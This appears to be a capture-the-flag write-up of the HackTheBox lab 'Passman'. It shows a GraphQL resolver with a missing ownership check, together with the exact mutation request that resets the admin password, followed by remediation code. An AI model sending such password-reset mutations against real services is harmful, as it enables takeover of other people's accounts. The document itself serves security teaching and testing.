HTB Passman

Passman is an easy-rated HackTheBox machine featuring a Node.js password manager vulnerable to IDOR via GraphQL mutations. This writeup demonstrates how I exploited an authorization flaw to change admin passwords and retrieve the flag.

Box Info

  • Name: Passman
  • OS: Linux
  • Difficulty: Easy
  • Creator: xclow3n
  • Release Date: 27 Oct 2022

Reconnaissance

Application Overview

The web application presents a password manager interface:

  • Login/Registration system

  • Dashboard to store credentials

  • GraphQL API endpoint at /graphql

Source Code Analysis

Reviewing the provided source code revealed critical insights:

  • Admin Privileges

  • Initial User Setup

Vulnerability Disclosure

GraphQL Enumeration & Flawed Authorization

After detecting the use of GraphQL in the application, I used Burp Suite's InQL extension to enumerate the schema and discovered a critical GraphQL mutation:

I noticed the UpdatePassword mutation there, then checked the source code for its resolver and identified a flaw that can be exploited as an IDOR vulnerability.

resolve: async (root, args, request) => {
    return new Promise((resolve, reject) => {
        if (!request.user) return reject(new GraphQLError('Authentication required!'));

        // Only authentication is checked: the caller's identity is never compared
        // with args.username, so any logged-in user can overwrite any account's password.
        db.updatePassword(args.username, args.password) // No ownership check
            .then(() => resolve({ message: 'Password updated' }))
            .catch(err => reject(err));
    });
}

Exploitation

Attack Workflow

I captured the mutation request used for storing passwords and modified it to match the UpdatePassword mutation:

  • Intercepted AddPhrase mutation request:

    {
        "query":
            "mutation($recType: String!, $recAddr: String!, $recUser: String!, $recPass: String!, $recNote: String!) { AddPhrase(recType: $recType, recAddr: $recAddr, recUser: $recUser, recPass: $recPass, recNote: $recNote) { message } }",
        "variables":
            {"recType":"Web","recAddr":"asdf","recUser":"adf","recPass":"adsf","recNote":"adsf"}
    }

  • Modified for UpdatePassword:

    {
        "query":
            "mutation($username: String!, $password: String!) { UpdatePassword(username: $username, password: $password) { message } }",
        "variables":
            {"username":"admin","password":"admin"}
    }

  • This changed the password of the user admin (identified from the source code)

  • I then successfully logged in as the root user and retrieved the flag from the admin dashboard (the stored password in the dashboard is the flag)

Remediation

  • Implement Proper Authorization (compare the caller's identity with the target account inside the resolver):
    if (request.user.username !== args.username && !request.user.isAdmin) {
        throw new GraphQLError('Unauthorized');
    }
  • GraphQL Security Best Practices:
    • Use schema directives for role-based access
    • Implement query whitelisting
    • Add rate limiting on sensitive operations

Key Takeaways

  • GraphQL introspection can reveal critical attack surfaces
  • Always validate ownership in mutation resolvers
  • Source code review often reveals logical flaws missed in black-box testing
  • Burp Suite’s InQL is invaluable for GraphQL API testing

/exit

Exploit complete. Session terminated. mic drop 🚩